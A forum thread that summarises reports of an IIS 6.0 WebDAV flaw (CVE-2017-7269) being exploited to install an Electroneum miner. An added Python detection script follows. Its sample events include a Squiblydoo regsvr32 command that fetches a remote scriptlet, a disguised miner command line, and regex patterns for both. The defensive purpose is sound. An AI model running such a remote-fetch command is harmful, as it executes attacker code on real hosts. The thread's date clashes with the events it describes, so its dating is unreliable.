Windows Servers Targeted for Cryptocurrency Mining via IIS Flaw

Faybert (thread author)
Jan 8, 2017
Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.

Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers using former IIS 6.0 zero-day

Hackers are using CVE-2017-7269 to take over servers. This is a vulnerability discovered by two Chinese researchers in March 2017 that affects IIS' WebDAV service. At the time it was discovered last year, the flaw was a zero-day, having been under heavy exploitation for almost nine months, since June 2016.

Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default: Windows XP and Windows Server 2003.
.....
.....
Hackers using CVE-2017-7269 to install Electroneum miner

Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of a Monero miner.

According to experts, the threat actor uses CVE-2017-7269 to deliver an ASCII shellcode which contains a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.

Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.

F5 experts said the Electroneum address they found in the attacks held only $99, suggesting either that they caught the campaign at its beginning or that the crooks are rotating address IDs to prevent researchers from tracking their entire operation.
........
........
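The post names three things a defender can look for: PROPFIND traffic against a WebDAV-enabled IIS 6.0 host (the request type CVE-2017-7269 is triggered through), regsvr32 fetching a remote scriptlet (Squiblydoo), and a miner masquerading as lsass.exe. The following Python is an added example of detection logic for those indicators run over sample records; it is not code from the article, from F5 Labs or from the campaign. The process-creation events and IIS W3C log lines are constructed for the example, the field layout of the W3C lines is an assumption stated in the code, and the stratum-URL check assumes an XMRig-style miner command line, which the post does not confirm.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or
    Windows Security 4688 provide). Constructed for this example."""
    image: str
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


# regsvr32 /s /n /u /i:http://host/file.sct scrobj.dll  (Squiblydoo)
SQUIBLYDOO_RE = re.compile(r'/i:\s*["\']?https?://', re.IGNORECASE)


def is_squiblydoo(ev: ProcEvent) -> bool:
    """regsvr32 asked to load a scriptlet over HTTP through scrobj.dll."""
    if _basename(ev.image) != 'regsvr32.exe':
        return False
    cl = ev.command_line.lower()
    return bool(SQUIBLYDOO_RE.search(cl)) and 'scrobj.dll' in cl


LSASS_PATH = r'c:\windows\system32\lsass.exe'
# The real lsass.exe is started by winlogon.exe on Server 2003 / XP
# (the affected platforms) and by wininit.exe on Vista and later.
LSASS_PARENTS = {'winlogon.exe', 'wininit.exe'}


def is_lsass_masquerade(ev: ProcEvent) -> bool:
    """A process named lsass.exe outside System32 or with an unexpected parent."""
    if _basename(ev.image) != 'lsass.exe':
        return False
    return (ev.image.lower() != LSASS_PATH
            or _basename(ev.parent_image) not in LSASS_PARENTS)


# Assumption: the miner takes a stratum pool URL on its command line,
# as XMRig-derived miners do. The post does not say which miner was used.
STRATUM_RE = re.compile(r'stratum\+(tcp|ssl)://', re.IGNORECASE)


def has_miner_cmdline(ev: ProcEvent) -> bool:
    return bool(STRATUM_RE.search(ev.command_line))


def triage(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """Return (image, [tags]) for every event that matches at least one check."""
    findings = []
    for ev in events:
        tags = []
        if is_squiblydoo(ev):
            tags.append('squiblydoo')
        if is_lsass_masquerade(ev):
            tags.append('lsass-masquerade')
        if has_miner_cmdline(ev):
            tags.append('stratum-miner')
        if tags:
            findings.append((ev.image, tags))
    return findings


# Assumed W3C field order (check the #Fields: line of your own logs):
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
def webdav_propfind_sources(log_lines: List[str]) -> Dict[str, int]:
    """Count PROPFIND requests per client IP. Default IIS logs do not record
    the If: header that carries the CVE-2017-7269 overflow, so this only
    narrows down which clients to examine with a packet capture or WAF log."""
    hits: Dict[str, int] = {}
    for line in log_lines:
        if line.startswith('#'):
            continue
        f = line.split()
        if len(f) < 11:
            continue
        method, client = f[3], f[8]
        if method.upper() == 'PROPFIND':
            hits[client] = hits.get(client, 0) + 1
    return hits


# Constructed sample data (not from the campaign).
SAMPLE_EVENTS = [
    ProcEvent(r'C:\Windows\System32\lsass.exe', r'C:\Windows\system32\lsass.exe',
              r'C:\Windows\System32\winlogon.exe'),
    ProcEvent(r'C:\Windows\Temp\lsass.exe',
              r'C:\Windows\Temp\lsass.exe -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER',
              r'C:\Windows\System32\cmd.exe'),
    ProcEvent(r'C:\Windows\System32\regsvr32.exe',
              'regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll',
              r'C:\Windows\System32\cmd.exe'),
    ProcEvent(r'C:\Windows\System32\regsvr32.exe',
              r'regsvr32 /s C:\Program Files\Vendor\vendor.dll',
              r'C:\Windows\System32\msiexec.exe'),
]

SAMPLE_IIS_LOG = [
    '#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status',
    '2018-01-10 03:12:44 10.0.0.5 GET /default.htm - 80 - 198.51.100.4 Mozilla/5.0 200',
    '2018-01-10 03:12:51 10.0.0.5 PROPFIND / - 80 - 203.0.113.10 Microsoft-WebDAV-MiniRedir/5.1.2600 401',
    '2018-01-10 03:12:52 10.0.0.5 PROPFIND / - 80 - 203.0.113.10 Microsoft-WebDAV-MiniRedir/5.1.2600 207',
]

if __name__ == '__main__':
    for image, tags in triage(SAMPLE_EVENTS):
        print(image, tags)
    print(webdav_propfind_sources(SAMPLE_IIS_LOG))
```

PROPFIND from a legitimate WebDAV client looks identical at the log level, so the IIS check is a triage filter rather than a verdict; the lsass and regsvr32 checks are much higher signal because the real lsass.exe runs exactly once from System32 and regsvr32 has no business loading a scriptlet from the internet.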